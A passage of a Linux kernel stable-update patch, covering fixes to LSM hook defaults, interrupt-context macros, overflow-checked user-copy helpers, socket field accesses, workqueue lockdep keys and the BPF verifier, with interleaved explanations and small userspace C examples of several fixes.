+ LSM_HOOK(int, 0, syslog, int type)
+ LSM_HOOK(int, 0, settime, const struct timespec64 *ts,
+ 	 const struct timezone *tz)
+-LSM_HOOK(int, 0, vm_enough_memory, struct mm_struct *mm, long pages)
++LSM_HOOK(int, 1, vm_enough_memory, struct mm_struct *mm, long pages)
+ LSM_HOOK(int, 0, bprm_creds_for_exec, struct linux_binprm *bprm)
+ LSM_HOOK(int, 0, bprm_creds_from_file, struct linux_binprm *bprm, struct file *file)
+ LSM_HOOK(int, 0, bprm_check_security, struct linux_binprm *bprm)
+@@ -266,7 +266,7 @@ LSM_HOOK(void, LSM_RET_VOID, release_secctx, char *secdata, u32 seclen)
+ LSM_HOOK(void, LSM_RET_VOID, inode_invalidate_secctx, struct inode *inode)
+ LSM_HOOK(int, 0, inode_notifysecctx, struct inode *inode, void *ctx, u32 ctxlen)
+ LSM_HOOK(int, 0, inode_setsecctx, struct dentry *dentry, void *ctx, u32 ctxlen)
+-LSM_HOOK(int, 0, inode_getsecctx, struct inode *inode, void **ctx,
++LSM_HOOK(int, -EOPNOTSUPP, inode_getsecctx, struct inode *inode, void **ctx,
+ 	 u32 *ctxlen)
+ 
+ #if defined(CONFIG_SECURITY) && defined(CONFIG_WATCH_QUEUE)
+diff --git a/include/linux/mmc/card.h b/include/linux/mmc/card.h
+index daa2f40d9ce65..7b12eebc5586d 100644
+--- a/include/linux/mmc/card.h
++++ b/include/linux/mmc/card.h
+@@ -295,7 +295,9 @@ struct mmc_card {
+ #define MMC_QUIRK_BROKEN_HPI	(1<<13)		/* Disable broken HPI support */
+ #define MMC_QUIRK_BROKEN_SD_DISCARD	(1<<14)	/* Disable broken SD discard support */
+ #define MMC_QUIRK_BROKEN_SD_CACHE	(1<<15)	/* Disable broken SD cache support */
++#define MMC_QUIRK_BROKEN_CACHE_FLUSH	(1<<16)	/* Don't flush cache until the write has occurred */
+ 
++	bool			written_flag;	/* Indicates eMMC has been written since power on */
+ 	bool			reenable_cmdq;	/* Re-enable Command Queue */
+ 
+ 	unsigned int		erase_size;	/* erase size in sectors */
+diff --git a/include/linux/preempt.h b/include/linux/preempt.h
+index 0df425bf9bd75..8cfcc5d454512 100644
+--- a/include/linux/preempt.h
++++ b/include/linux/preempt.h
+@@ -98,14 +98,21 @@ static __always_inline unsigned char interrupt_context_level(void)
+ 	return level;
+ }
+ 
++/*
++ * These macro definitions avoid redundant invocations of preempt_count()
++ * because such invocations would result in redundant loads given that
++ * preempt_count() is commonly implemented with READ_ONCE().
++ */
++
+ #define nmi_count()	(preempt_count() & NMI_MASK)
+ #define hardirq_count()	(preempt_count() & HARDIRQ_MASK)
+ #ifdef CONFIG_PREEMPT_RT
+ # define softirq_count()	(current->softirq_disable_cnt & SOFTIRQ_MASK)
++# define irq_count()		((preempt_count() & (NMI_MASK | HARDIRQ_MASK)) | softirq_count())
+ #else
+ # define softirq_count()	(preempt_count() & SOFTIRQ_MASK)
++# define irq_count()		(preempt_count() & (NMI_MASK | HARDIRQ_MASK | SOFTIRQ_MASK))
+ #endif
+-#define irq_count()	(nmi_count() | hardirq_count() | softirq_count())
+ 
+ /*
+  * Macros to retrieve the current execution context:
+@@ -118,7 +125,11 @@ static __always_inline unsigned char interrupt_context_level(void)
+ #define in_nmi()		(nmi_count())
+ #define in_hardirq()		(hardirq_count())
+ #define in_serving_softirq()	(softirq_count() & SOFTIRQ_OFFSET)
+-#define in_task()		(!(in_nmi() | in_hardirq() | in_serving_softirq()))
++#ifdef CONFIG_PREEMPT_RT
++# define in_task()		(!((preempt_count() & (NMI_MASK | HARDIRQ_MASK)) | in_serving_softirq()))
++#else
++# define in_task()		(!(preempt_count() & (NMI_MASK | HARDIRQ_MASK | SOFTIRQ_OFFSET)))
++#endif
+ 
+ /*
+  * The following macros are deprecated and should not be used in new code:
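
As the new preempt.h comment says, folding the masks into one expression avoids re-reading the preemption counter for every sub-mask. A userspace sketch of the load-once idea, with a volatile global standing in for the per-CPU counter:

#include <stdio.h>

#define NMI_MASK	0x00100000u
#define HARDIRQ_MASK	0x000f0000u
#define SOFTIRQ_MASK	0x0000ff00u

/* Volatile so each call really is a separate load, like READ_ONCE(). */
static volatile unsigned int the_count = 0x00010000u; /* one hardirq level */

static unsigned int preempt_count(void) { return the_count; }

/* Old form: three independent loads of the counter. */
static unsigned int irq_count_old(void)
{
	return (preempt_count() & NMI_MASK) |
	       (preempt_count() & HARDIRQ_MASK) |
	       (preempt_count() & SOFTIRQ_MASK);
}

/* New form: a single load masked once. */
static unsigned int irq_count_new(void)
{
	return preempt_count() & (NMI_MASK | HARDIRQ_MASK | SOFTIRQ_MASK);
}

int main(void)
{
	printf("old=%#x new=%#x\n", irq_count_old(), irq_count_new());
	return 0;
}
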
+diff --git a/include/linux/pwm.h b/include/linux/pwm.h
+index 161e91167b9c0..5e88f1b591832 100644
+--- a/include/linux/pwm.h
++++ b/include/linux/pwm.h
+@@ -41,8 +41,8 @@ struct pwm_args {
+ };
+ 
+ enum {
+-	PWMF_REQUESTED = 1 << 0,
+-	PWMF_EXPORTED = 1 << 1,
++	PWMF_REQUESTED = 0,
++	PWMF_EXPORTED = 1,
+ };
+ 
+ /*
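
The pwm.h fix converts PWMF_REQUESTED/PWMF_EXPORTED from masks (1 << 0, 1 << 1) to bit numbers (0, 1), since they are consumed by set_bit()/test_bit()-style helpers that take bit numbers. A sketch of why the distinction matters, with the helpers reimplemented here for illustration:

#include <stdio.h>

static void set_bit(unsigned int nr, unsigned long *word)
{
	*word |= 1UL << nr;
}

static int test_bit(unsigned int nr, const unsigned long *word)
{
	return (*word >> nr) & 1;
}

enum { FLAG_REQUESTED = 0, FLAG_EXPORTED = 1 };	/* bit numbers */

int main(void)
{
	unsigned long flags = 0;

	set_bit(FLAG_EXPORTED, &flags);
	/* With the old mask-style value (1 << 1) == 2, this would have
	 * set bit 2 (value 4) and the test below would fail. */
	printf("exported=%d flags=%#lx\n", test_bit(FLAG_EXPORTED, &flags),
	       flags);
	return 0;
}
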
+diff --git a/include/linux/socket.h b/include/linux/socket.h
+index de3701a2a2129..1db29aab8f9c3 100644
+--- a/include/linux/socket.h
++++ b/include/linux/socket.h
+@@ -376,6 +376,7 @@ struct ucred {
+ #define SOL_MPTCP	284
+ #define SOL_MCTP	285
+ #define SOL_SMC		286
++#define SOL_VSOCK	287
+ 
+ /* IPX options */
+ #define IPX_TYPE	1
+diff --git a/include/linux/string.h b/include/linux/string.h
+index 26ab8928d8661..422606e98cc42 100644
+--- a/include/linux/string.h
++++ b/include/linux/string.h
+@@ -5,7 +5,9 @@
+ #include <linux/compiler.h>	/* for inline */
+ #include <linux/types.h>	/* for size_t */
+ #include <linux/stddef.h>	/* for NULL */
++#include <linux/err.h>		/* for ERR_PTR() */
+ #include <linux/errno.h>	/* for E2BIG */
++#include <linux/overflow.h>	/* for check_mul_overflow() */
+ #include <linux/stdarg.h>
+ #include <uapi/linux/string.h>
+ 
+@@ -14,6 +16,44 @@ extern void *memdup_user(const void __user *, size_t);
+ extern void *vmemdup_user(const void __user *, size_t);
+ extern void *memdup_user_nul(const void __user *, size_t);
+ 
++/**
++ * memdup_array_user - duplicate array from user space
++ * @src: source address in user space
++ * @n: number of array members to copy
++ * @size: size of one array member
++ *
++ * Return: an ERR_PTR() on failure. Result is physically
++ * contiguous, to be freed by kfree().
++ */
++static inline void *memdup_array_user(const void __user *src, size_t n, size_t size)
++{
++	size_t nbytes;
++
++	if (check_mul_overflow(n, size, &nbytes))
++		return ERR_PTR(-EOVERFLOW);
++
++	return memdup_user(src, nbytes);
++}
++
++/**
++ * vmemdup_array_user - duplicate array from user space
++ * @src: source address in user space
++ * @n: number of array members to copy
++ * @size: size of one array member
++ *
++ * Return: an ERR_PTR() on failure. Result may not be
++ * physically contiguous. Use kvfree() to free.
++ */
++static inline void *vmemdup_array_user(const void __user *src, size_t n, size_t size)
++{
++	size_t nbytes;
++
++	if (check_mul_overflow(n, size, &nbytes))
++		return ERR_PTR(-EOVERFLOW);
++
++	return vmemdup_user(src, nbytes);
++}
++
+ /*
+  * Include machine specific inline routines
+  */
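
memdup_array_user()/vmemdup_array_user() above fold the multiplication-overflow check into the copy helper so callers cannot get a short allocation from a hostile element count (the kexec and watch_queue hunks later in this patch switch to them). A userspace analogue using the GCC/Clang __builtin_mul_overflow() builtin:

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static void *memdup_array(const void *src, size_t n, size_t size)
{
	size_t nbytes;
	void *p;

	if (__builtin_mul_overflow(n, size, &nbytes)) {
		errno = EOVERFLOW;
		return NULL;	/* refuse a wrapped, too-small allocation */
	}
	p = malloc(nbytes);
	if (p)
		memcpy(p, src, nbytes);
	return p;
}

int main(void)
{
	int vals[4] = { 1, 2, 3, 4 };
	int *copy = memdup_array(vals, 4, sizeof(int));

	printf("copy[3]=%d\n", copy ? copy[3] : -1);
	printf("huge: %p\n", memdup_array(vals, (size_t)-1, sizeof(int)));
	free(copy);
	return 0;
}
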
+diff --git a/include/linux/sunrpc/clnt.h b/include/linux/sunrpc/clnt.h
+index 770ef2cb57752..c794b0ce4e782 100644
+--- a/include/linux/sunrpc/clnt.h
++++ b/include/linux/sunrpc/clnt.h
+@@ -84,6 +84,7 @@ struct rpc_clnt {
+ 	};
+ 	const struct cred	*cl_cred;
+ 	unsigned int		cl_max_connect; /* max number of transports not to the same IP */
++	struct super_block *pipefs_sb;
+ };
+ 
+ /*
+diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
+index 780690dc08cda..a207c7ed41bd2 100644
+--- a/include/linux/sysctl.h
++++ b/include/linux/sysctl.h
+@@ -238,6 +238,7 @@ extern void __register_sysctl_init(const char *path, struct ctl_table *table,
+ extern struct ctl_table_header *register_sysctl_mount_point(const char *path);
+ 
+ void do_sysctl_args(void);
++bool sysctl_is_alias(char *param);
+ int do_proc_douintvec(struct ctl_table *table, int write,
+ 		      void *buffer, size_t *lenp, loff_t *ppos,
+ 		      int (*conv)(unsigned long *lvalp,
+@@ -301,6 +302,11 @@ static inline void setup_sysctl_set(struct ctl_table_set *p,
+ static inline void do_sysctl_args(void)
+ {
+ }
++
++static inline bool sysctl_is_alias(char *param)
++{
++	return false;
++}
+ #endif /* CONFIG_SYSCTL */
+ 
+ int sysctl_max_threads(struct ctl_table *table, int write, void *buffer,
+diff --git a/include/linux/trace_events.h b/include/linux/trace_events.h
+index 422f4ca656cf9..c8b5e9781d01a 100644
+--- a/include/linux/trace_events.h
++++ b/include/linux/trace_events.h
+@@ -478,6 +478,7 @@ enum {
+ 	EVENT_FILE_FL_TRIGGER_COND_BIT,
+ 	EVENT_FILE_FL_PID_FILTER_BIT,
+ 	EVENT_FILE_FL_WAS_ENABLED_BIT,
++	EVENT_FILE_FL_FREED_BIT,
+ };
+ 
+ extern struct trace_event_file *trace_get_event_file(const char *instance,
+@@ -616,6 +617,7 @@ extern int __kprobe_event_add_fields(struct dynevent_cmd *cmd, ...);
+  *  TRIGGER_COND  - When set, one or more triggers has an associated filter
+  *  PID_FILTER    - When set, the event is filtered based on pid
+  *  WAS_ENABLED   - Set when enabled to know to clear trace on module removal
++ *  FREED         - File descriptor is freed, all fields should be considered invalid
+  */
+ enum {
+ 	EVENT_FILE_FL_ENABLED		= (1 << EVENT_FILE_FL_ENABLED_BIT),
+@@ -629,6 +631,7 @@ enum {
+ 	EVENT_FILE_FL_TRIGGER_COND	= (1 << EVENT_FILE_FL_TRIGGER_COND_BIT),
+ 	EVENT_FILE_FL_PID_FILTER	= (1 << EVENT_FILE_FL_PID_FILTER_BIT),
+ 	EVENT_FILE_FL_WAS_ENABLED	= (1 << EVENT_FILE_FL_WAS_ENABLED_BIT),
++	EVENT_FILE_FL_FREED		= (1 << EVENT_FILE_FL_FREED_BIT),
+ };
+ 
+ struct trace_event_file {
+@@ -657,6 +660,7 @@ struct trace_event_file {
+ 	 * caching and such. Which is mostly OK ;-)
+ 	 */
+ 	unsigned long		flags;
++	atomic_t		ref;	/* ref count for opened files */
+ 	atomic_t		sm_ref;	/* soft-mode reference counter */
+ 	atomic_t		tm_ref;	/* trigger-mode reference counter */
+ };
+diff --git a/include/linux/workqueue.h b/include/linux/workqueue.h
+index 3ca41b9da6473..5d052e193a85c 100644
+--- a/include/linux/workqueue.h
++++ b/include/linux/workqueue.h
+@@ -222,18 +222,16 @@ static inline unsigned int work_static(struct work_struct *work) { return 0; }
+  * to generate better code.
+  */
+ #ifdef CONFIG_LOCKDEP
+-#define __INIT_WORK(_work, _func, _onstack)				\
++#define __INIT_WORK_KEY(_work, _func, _onstack, _key)			\
+ 	do {								\
+-		static struct lock_class_key __key;			\
+-									\
+ 		__init_work((_work), _onstack);				\
+ 		(_work)->data = (atomic_long_t) WORK_DATA_INIT();	\
+-		lockdep_init_map(&(_work)->lockdep_map, "(work_completion)"#_work, &__key, 0); \
++		lockdep_init_map(&(_work)->lockdep_map, "(work_completion)"#_work, (_key), 0); \
+ 		INIT_LIST_HEAD(&(_work)->entry);			\
+ 		(_work)->func = (_func);				\
+ 	} while (0)
+ #else
+-#define __INIT_WORK(_work, _func, _onstack)				\
++#define __INIT_WORK_KEY(_work, _func, _onstack, _key)			\
+ 	do {								\
+ 		__init_work((_work), _onstack);				\
+ 		(_work)->data = (atomic_long_t) WORK_DATA_INIT();	\
+@@ -242,12 +240,22 @@ static inline unsigned int work_static(struct work_struct *work) { return 0; }
+ 	} while (0)
+ #endif
+ 
++#define __INIT_WORK(_work, _func, _onstack)				\
++	do {								\
++		static __maybe_unused struct lock_class_key __key;	\
++									\
++		__INIT_WORK_KEY(_work, _func, _onstack, &__key);	\
++	} while (0)
++
+ #define INIT_WORK(_work, _func)						\
+ 	__INIT_WORK((_work), (_func), 0)
+ 
+ #define INIT_WORK_ONSTACK(_work, _func)					\
+ 	__INIT_WORK((_work), (_func), 1)
+ 
++#define INIT_WORK_ONSTACK_KEY(_work, _func, _key)			\
++	__INIT_WORK_KEY((_work), (_func), 1, _key)
++
+ #define __INIT_DELAYED_WORK(_work, _func, _tflags)			\
+ 	do {								\
+ 		INIT_WORK(&(_work)->work, (_func));			\
+@@ -681,8 +689,32 @@ static inline long work_on_cpu_safe(int cpu, long (*fn)(void *), void *arg)
+ 	return fn(arg);
+ }
+ #else
+-long work_on_cpu(int cpu, long (*fn)(void *), void *arg);
+-long work_on_cpu_safe(int cpu, long (*fn)(void *), void *arg);
++long work_on_cpu_key(int cpu, long (*fn)(void *),
++		     void *arg, struct lock_class_key *key);
++/*
++ * A new key is defined for each caller to make sure the work
++ * associated with the function doesn't share its locking class.
++ */
++#define work_on_cpu(_cpu, _fn, _arg)			\
++({							\
++	static struct lock_class_key __key;		\
++							\
++	work_on_cpu_key(_cpu, _fn, _arg, &__key);	\
++})
++
++long work_on_cpu_safe_key(int cpu, long (*fn)(void *),
++			  void *arg, struct lock_class_key *key);
++
++/*
++ * A new key is defined for each caller to make sure the work
++ * associated with the function doesn't share its locking class.
++ */
++#define work_on_cpu_safe(_cpu, _fn, _arg)		\
++({							\
++	static struct lock_class_key __key;		\
++							\
++	work_on_cpu_safe_key(_cpu, _fn, _arg, &__key);	\
++})
+ #endif /* CONFIG_SMP */
+ 
+ #ifdef CONFIG_FREEZER
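
The work_on_cpu()/work_on_cpu_safe() macros above rely on a GNU C statement expression to give every call site its own static lock_class_key. A sketch of that per-callsite-static trick, with a plain counter standing in for the key (GNU C statement expressions assumed, as in the kernel):

#include <stdio.h>

struct key { int uses; };

static int run_with_key(int arg, struct key *key)
{
	key->uses++;
	return arg + key->uses;
}

#define run(arg)				\
({						\
	static struct key __key;		\
						\
	run_with_key((arg), &__key);		\
})

int main(void)
{
	int i;

	/* One expansion of run(): both iterations share a single key. */
	for (i = 0; i < 2; i++)
		printf("site A call %d: %d\n", i, run(10));	/* 11, 12 */
	/* A second expansion gets its own, freshly zeroed key. */
	printf("site B: %d\n", run(10));			/* 11 */
	return 0;
}
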
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index d1f81a6d7773b..c726da3b7d68a 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -177,9 +177,9 @@ static inline __be32 nft_reg_load_be32(const u32 *sreg)
+ 	return *(__force __be32 *)sreg;
+ }
+ 
+-static inline void nft_reg_store64(u32 *dreg, u64 val)
++static inline void nft_reg_store64(u64 *dreg, u64 val)
+ {
+-	put_unaligned(val, (u64 *)dreg);
++	put_unaligned(val, dreg);
+ }
+ 
+ static inline u64 nft_reg_load64(const u32 *sreg)
+diff --git a/include/net/sock.h b/include/net/sock.h
+index a1fcbb2a8a2ce..b6027b01c2455 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2032,21 +2032,33 @@ static inline void sk_tx_queue_set(struct sock *sk, int tx_queue)
+ 	/* sk_tx_queue_mapping accept only upto a 16-bit value */
+ 	if (WARN_ON_ONCE((unsigned short)tx_queue >= USHRT_MAX))
+ 		return;
+-	sk->sk_tx_queue_mapping = tx_queue;
++	/* Paired with READ_ONCE() in sk_tx_queue_get() and
++	 * other WRITE_ONCE() because the socket lock might not be held.
++	 */
++	WRITE_ONCE(sk->sk_tx_queue_mapping, tx_queue);
+ }
+ 
+ #define NO_QUEUE_MAPPING	USHRT_MAX
+ 
+ static inline void sk_tx_queue_clear(struct sock *sk)
+ {
+-	sk->sk_tx_queue_mapping = NO_QUEUE_MAPPING;
++	/* Paired with READ_ONCE() in sk_tx_queue_get() and
++	 * other WRITE_ONCE() because the socket lock might not be held.
++	 */
++	WRITE_ONCE(sk->sk_tx_queue_mapping, NO_QUEUE_MAPPING);
+ }
+ 
+ static inline int sk_tx_queue_get(const struct sock *sk)
+ {
+-	if (sk && sk->sk_tx_queue_mapping != NO_QUEUE_MAPPING)
+-		return sk->sk_tx_queue_mapping;
++	if (sk) {
++		/* Paired with WRITE_ONCE() in sk_tx_queue_clear()
++		 * and sk_tx_queue_set().
++		 */
++		int val = READ_ONCE(sk->sk_tx_queue_mapping);
+ 
++		if (val != NO_QUEUE_MAPPING)
++			return val;
++	}
+ 	return -1;
+ }
+ 
+@@ -2195,7 +2207,7 @@ static inline void __dst_negative_advice(struct sock *sk)
+ 		if (ndst != dst) {
+ 			rcu_assign_pointer(sk->sk_dst_cache, ndst);
+ 			sk_tx_queue_clear(sk);
+-			sk->sk_dst_pending_confirm = 0;
++			WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+ 		}
+ 	}
+ }
+@@ -2212,7 +2224,7 @@ __sk_dst_set(struct sock *sk, struct dst_entry *dst)
+ 	struct dst_entry *old_dst;
+ 
+ 	sk_tx_queue_clear(sk);
+-	sk->sk_dst_pending_confirm = 0;
++	WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+ 	old_dst = rcu_dereference_protected(sk->sk_dst_cache,
+ 					    lockdep_sock_is_held(sk));
+ 	rcu_assign_pointer(sk->sk_dst_cache, dst);
+@@ -2225,7 +2237,7 @@ sk_dst_set(struct sock *sk, struct dst_entry *dst)
+ 	struct dst_entry *old_dst;
+ 
+ 	sk_tx_queue_clear(sk);
+-	sk->sk_dst_pending_confirm = 0;
++	WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+ 	old_dst = xchg((__force struct dst_entry **)&sk->sk_dst_cache, dst);
+ 	dst_release(old_dst);
+ }
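
The sock.h hunks wrap sk_tx_queue_mapping and sk_dst_pending_confirm accesses in READ_ONCE()/WRITE_ONCE() because the fields can be touched without the socket lock. The portable C11 analogue is a relaxed atomic load/store, as in this sketch (compile with -pthread):

#include <limits.h>
#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>

#define NO_QUEUE_MAPPING USHRT_MAX

static _Atomic unsigned short tx_queue_mapping = NO_QUEUE_MAPPING;

/* WRITE_ONCE() analogue: a relaxed atomic store. */
static void *writer(void *arg)
{
	(void)arg;
	atomic_store_explicit(&tx_queue_mapping, 3, memory_order_relaxed);
	return NULL;
}

/* READ_ONCE() analogue: load once, then test the local copy. */
static int tx_queue_get(void)
{
	unsigned short val =
		atomic_load_explicit(&tx_queue_mapping, memory_order_relaxed);

	return val != NO_QUEUE_MAPPING ? val : -1;
}

int main(void)
{
	pthread_t t;

	pthread_create(&t, NULL, writer, NULL);
	pthread_join(t, NULL);
	printf("queue=%d\n", tx_queue_get());	/* 3 */
	return 0;
}
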
+diff --git a/include/sound/soc-acpi.h b/include/sound/soc-acpi.h
+index 528279056b3ab..1a5f90b0a5463 100644
+--- a/include/sound/soc-acpi.h
++++ b/include/sound/soc-acpi.h
+@@ -67,6 +67,10 @@ static inline struct snd_soc_acpi_mach *snd_soc_acpi_codec_list(void *arg)
+  * @i2s_link_mask: I2S/TDM links enabled on the board
+  * @num_dai_drivers: number of elements in @dai_drivers
+  * @dai_drivers: pointer to dai_drivers, used e.g. in nocodec mode
++ * @subsystem_vendor: optional PCI SSID vendor value
++ * @subsystem_device: optional PCI SSID device value
++ * @subsystem_id_set: true if a value has been written to
++ *		      subsystem_vendor and subsystem_device.
+  */
+ struct snd_soc_acpi_mach_params {
+ 	u32 acpi_ipc_irq_index;
+@@ -79,6 +83,9 @@ struct snd_soc_acpi_mach_params {
+ 	u32 i2s_link_mask;
+ 	u32 num_dai_drivers;
+ 	struct snd_soc_dai_driver *dai_drivers;
++	unsigned short subsystem_vendor;
++	unsigned short subsystem_device;
++	bool subsystem_id_set;
+ };
+ 
+ /**
+diff --git a/include/sound/soc-card.h b/include/sound/soc-card.h
+index 9d31a5c0db33c..40d3023cf0d16 100644
+--- a/include/sound/soc-card.h
++++ b/include/sound/soc-card.h
+@@ -44,6 +44,43 @@ int snd_soc_card_add_dai_link(struct snd_soc_card *card,
+ void snd_soc_card_remove_dai_link(struct snd_soc_card *card,
+ 				  struct snd_soc_dai_link *dai_link);
+ 
++#ifdef CONFIG_PCI
++static inline void snd_soc_card_set_pci_ssid(struct snd_soc_card *card,
++					     unsigned short vendor,
++					     unsigned short device)
++{
++	card->pci_subsystem_vendor = vendor;
++	card->pci_subsystem_device = device;
++	card->pci_subsystem_set = true;
++}
++
++static inline int snd_soc_card_get_pci_ssid(struct snd_soc_card *card,
++					    unsigned short *vendor,
++					    unsigned short *device)
++{
++	if (!card->pci_subsystem_set)
++		return -ENOENT;
++
++	*vendor = card->pci_subsystem_vendor;
++	*device = card->pci_subsystem_device;
++
++	return 0;
++}
++#else /* !CONFIG_PCI */
++static inline void snd_soc_card_set_pci_ssid(struct snd_soc_card *card,
++					     unsigned short vendor,
++					     unsigned short device)
++{
++}
++
++static inline int snd_soc_card_get_pci_ssid(struct snd_soc_card *card,
++					    unsigned short *vendor,
++					    unsigned short *device)
++{
++	return -ENOENT;
++}
++#endif /* CONFIG_PCI */
++
+ /* device driver data */
+ static inline void snd_soc_card_set_drvdata(struct snd_soc_card *card,
+ 					    void *data)
+diff --git a/include/sound/soc.h b/include/sound/soc.h
+index 37bbfc8b45cb2..108617cea9c67 100644
+--- a/include/sound/soc.h
++++ b/include/sound/soc.h
+@@ -911,6 +911,17 @@ struct snd_soc_card {
+ #ifdef CONFIG_DMI
+ 	char dmi_longname[80];
+ #endif /* CONFIG_DMI */
++
++#ifdef CONFIG_PCI
++	/*
++	 * PCI does not define 0 as invalid, so pci_subsystem_set indicates
++	 * whether a value has been written to these fields.
++	 */
++	unsigned short pci_subsystem_vendor;
++	unsigned short pci_subsystem_device;
++	bool pci_subsystem_set;
++#endif /* CONFIG_PCI */
++
+ 	char topology_shortname[32];
+ 
+ 	struct device *dev;
+diff --git a/include/sound/sof.h b/include/sound/sof.h
+index 341fef19e6124..1caeb7bf109b4 100644
+--- a/include/sound/sof.h
++++ b/include/sound/sof.h
+@@ -63,6 +63,14 @@ struct snd_sof_pdata {
+ 	const char *name;
+ 	const char *platform;
+ 
++	/*
++	 * PCI SSID. As PCI does not define 0 as invalid, the subsystem_id_set
++	 * flag indicates that a value has been written to these members.
++	 */
++	unsigned short subsystem_vendor;
++	unsigned short subsystem_device;
++	bool subsystem_id_set;
++
+ 	struct device *dev;
+ 
+ 	/* indicate how many first bytes shouldn't be loaded into DSP memory. */
+diff --git a/include/uapi/linux/vm_sockets.h b/include/uapi/linux/vm_sockets.h
+index c60ca33eac594..ed07181d4eff9 100644
+--- a/include/uapi/linux/vm_sockets.h
++++ b/include/uapi/linux/vm_sockets.h
+@@ -191,4 +191,21 @@ struct sockaddr_vm {
+ 
+ #define IOCTL_VM_SOCKETS_GET_LOCAL_CID		_IO(7, 0xb9)
+ 
++/* MSG_ZEROCOPY notifications are encoded in the standard error format,
++ * sock_extended_err. See Documentation/networking/msg_zerocopy.rst in
++ * kernel source tree for more details.
++ */
++
++/* 'cmsg_level' field value of 'struct cmsghdr' for notification parsing
++ * when MSG_ZEROCOPY flag is used on transmissions.
++ */
++
++#define SOL_VSOCK	287
++
++/* 'cmsg_type' field value of 'struct cmsghdr' for notification parsing
++ * when MSG_ZEROCOPY flag is used on transmissions.
++ */
++
++#define VSOCK_RECVERR	1
++
+ #endif /* _UAPI_VM_SOCKETS_H */
+diff --git a/init/main.c b/init/main.c
+index fe378351e8a95..87a52bdb41d67 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -533,6 +533,10 @@ static int __init unknown_bootoption(char *param, char *val,
+ {
+ 	size_t len = strlen(param);
+ 
++	/* Handle params aliased to sysctls */
++	if (sysctl_is_alias(param))
++		return 0;
++
+ 	repair_env_string(param, val);
+ 
+ 	/* Handle obsolete-style parameters */
+diff --git a/kernel/audit_watch.c b/kernel/audit_watch.c
+index 65075f1e4ac8c..7a98cd176a127 100644
+--- a/kernel/audit_watch.c
++++ b/kernel/audit_watch.c
+@@ -527,11 +527,18 @@ int audit_exe_compare(struct task_struct *tsk, struct audit_fsnotify_mark *mark)
+ 	unsigned long ino;
+ 	dev_t dev;
+ 
+-	exe_file = get_task_exe_file(tsk);
++	/* only do exe filtering if we are recording @current events/records */
++	if (tsk != current)
++		return 0;
++
++	if (!current->mm)
++		return 0;
++	exe_file = get_mm_exe_file(current->mm);
+ 	if (!exe_file)
+ 		return 0;
+ 	ino = file_inode(exe_file)->i_ino;
+ 	dev = file_inode(exe_file)->i_sb->s_dev;
+ 	fput(exe_file);
++
+ 	return audit_mark_compare(mark, ino, dev);
+ }
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 64706723624b9..7225cb67c0d3a 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -608,7 +608,11 @@ static __always_inline int bpf_tree_comp(void *key, struct latch_tree_node *n)
+ 
+ 	if (val < ksym->start)
+ 		return -1;
+-	if (val >= ksym->end)
++	/* Ensure that we detect return addresses as part of the program when
++	 * the final instruction is a call, for a program that appears in a
++	 * stack trace. Therefore, do val > ksym->end instead of val >= ksym->end.
++	 */
++	if (val > ksym->end)
+ 		return  1;
+ 
+ 	return 0;
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index eb3f52be115d6..12d360d80c149 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -978,7 +978,8 @@ static void print_verifier_state(struct bpf_verifier_env *env,
+ 	if (state->in_async_callback_fn)
+ 		verbose(env, " async_cb");
+ 	verbose(env, "\n");
+-	mark_verifier_state_clean(env);
++	if (!print_all)
++		mark_verifier_state_clean(env);
+ }
+ 
+ static inline u32 vlog_alignment(u32 pos)
+@@ -2595,7 +2596,12 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 	if (class == BPF_ALU || class == BPF_ALU64) {
+ 		if (!(*reg_mask & dreg))
+ 			return 0;
+-		if (opcode == BPF_MOV) {
++		if (opcode == BPF_END || opcode == BPF_NEG) {
++			/* sreg is reserved and unused
++			 * dreg still needs precision before this insn
++			 */
++			return 0;
++		} else if (opcode == BPF_MOV) {
+ 			if (BPF_SRC(insn->code) == BPF_X) {
+ 				/* dreg = sreg
+ 				 * dreg needs precision after this insn
+@@ -3291,7 +3297,7 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 		   insn->imm != 0 && env->bpf_capable) {
+ 		struct bpf_reg_state fake_reg = {};
+ 
+-		__mark_reg_known(&fake_reg, (u32)insn->imm);
++		__mark_reg_known(&fake_reg, insn->imm);
+ 		fake_reg.type = SCALAR_VALUE;
+ 		save_register_state(state, spi, &fake_reg, size);
+ 	} else if (reg && is_spillable_regtype(reg->type)) {
+@@ -10476,6 +10482,8 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 		    !sanitize_speculative_path(env, insn, *insn_idx + 1,
+ 					       *insn_idx))
+ 			return -EFAULT;
++		if (env->log.level & BPF_LOG_LEVEL)
++			print_insn_state(env, this_branch->frame[this_branch->curframe]);
+ 		*insn_idx += insn->off;
+ 		return 0;
+ 	} else if (pred == 0) {
+@@ -10488,6 +10496,8 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 					       *insn_idx + insn->off + 1,
+ 					       *insn_idx))
+ 			return -EFAULT;
++		if (env->log.level & BPF_LOG_LEVEL)
++			print_insn_state(env, this_branch->frame[this_branch->curframe]);
+ 		return 0;
+ 	}
+ 
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index f8eb1825f704f..0e4d362e90825 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -1243,11 +1243,14 @@ static int cpu_down_maps_locked(unsigned int cpu, enum cpuhp_state target)
+ 	/*
+ 	 * Ensure that the control task does not run on the to be offlined
+ 	 * CPU to prevent a deadlock against cfs_b->period_timer.
++	 * Also keep at least one housekeeping cpu online to avoid generating
++	 * an empty sched_domain span.
+ 	 */
+-	cpu = cpumask_any_but(cpu_online_mask, cpu);
